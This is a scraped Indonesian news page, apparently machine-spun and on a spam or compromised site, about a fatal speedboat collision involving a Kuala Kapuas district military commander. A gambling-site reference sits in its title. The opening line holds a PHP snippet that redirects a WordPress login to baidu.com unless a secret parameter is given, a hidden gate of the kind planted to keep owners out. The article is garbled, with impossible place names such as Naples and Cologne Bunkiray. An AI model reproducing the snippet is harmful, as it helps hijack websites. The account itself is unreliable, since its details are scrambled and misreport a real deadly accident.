//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Jadwal lengkap untuk tabrakan speedboat dengan longboat yang menewaskan Dandim Kuala Kapuas | daftar s128_www.s1288.net_s1288 net

TRIBUNNEWS.COM-Pada hari Senin, banjir terjadi di Palangkaraya, Provinsi Kalimantan Tengah. (03/09/2020) Subaru, Distrik Tinggi Sabang.

Baca: Angkatan Udara Indonesia telah mengerahkan tiga jet tempur F-16, pelatih keselamatan laut Maluku

Kecelakaan itu menewaskan 7 orang, termasuk Termasuk Komandan Kodim (Dandim) 1011 / Letnan Kuala Kalo Bapbang Kristianto Bawono. – Peluncuran Kompas.com, petugas informasi Kolonel Kodam XII / Inf Tanjungpura Aulia Fahmi Dalimunthe menjelaskan urutan kronologis kecelakaan air. Sebaliknya, Mas, satu dari kiri (L300) dan satu dari (L300) KMC RBB), “kata Fahmi kepada Kompas.com, Senin (9/3/2020).

Fahmi menjelaskan bahwa kecelakaan itu terjadi di Dandy Rombongan speedboat Pasukan Keamanan Presiden (Paspampres) yang ditumpangi Dandim Kuala Kapuas memeriksa Taman Nasional Tinggi Saipan .- Inspektur Ini untuk mempersiapkan Presiden Joko Widodo Dan persiapan kedatangan Raja William Alexander dan Latu Massima dari Belanda.

Setelah pemeriksaan oleh rombongan Paspan Pres, mereka kembali langsung ke pelabuhan dari Cologne Bunkiray. — -Selama perjalanan di Naples, kapal Paspampres yang menyertainya bertabrakan dengan kapal L300, yang mengangkut logistik ke Taman Nasional Sebangau.

Ketika kedua kapal bertabrakan, tidak dapat dihindari bahwa tabrakan terjadi.

Add Comment

Your email address will not be published. Required fields are marked *